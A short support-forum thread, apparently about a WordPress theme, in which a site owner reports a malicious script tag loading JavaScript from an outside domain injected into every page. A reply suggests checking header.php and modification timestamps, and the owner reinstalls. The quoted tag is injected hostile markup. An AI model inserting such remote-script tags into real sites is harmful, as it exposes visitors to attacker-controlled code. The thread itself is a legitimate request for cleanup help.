• Creator
    Topic
  • #14331

    Randall Ayers
    Spectator

    I’ve got an issue with some code that was inserted into all my pages.
    <script src="http://dx.jd9.co/a/cagode.js" type="text/javascript"></script>
    has been inserted via a hack or malware. Everything is updated and I’m not sure that this is actually doing anything because I’ve blocked the domain and IP from and my logs indicate no traffic.
    The script is inserted as the very first line in all my pages. Is there any simple way to remove this or find how it’s getting inserted?

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)
Replies
  • Alok Maheshwari
    Spectator
    Post count: 303
    #14343 |

    Check header.php in theme folder. If it is getting included from some wp core files, you can try looking for modified time stamp to see which files were changed recently on your site.

    Randall Ayers
    Spectator
    Post count: 6
    #14344 |

    Thanks Alok.
    I took the opportunity to update my Alora install and did a nuke and pave, reinstall. So far so good.
    Having a couple of theme formatting issues that I’ll search here for some answers.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Inserted script’ is closed to new replies.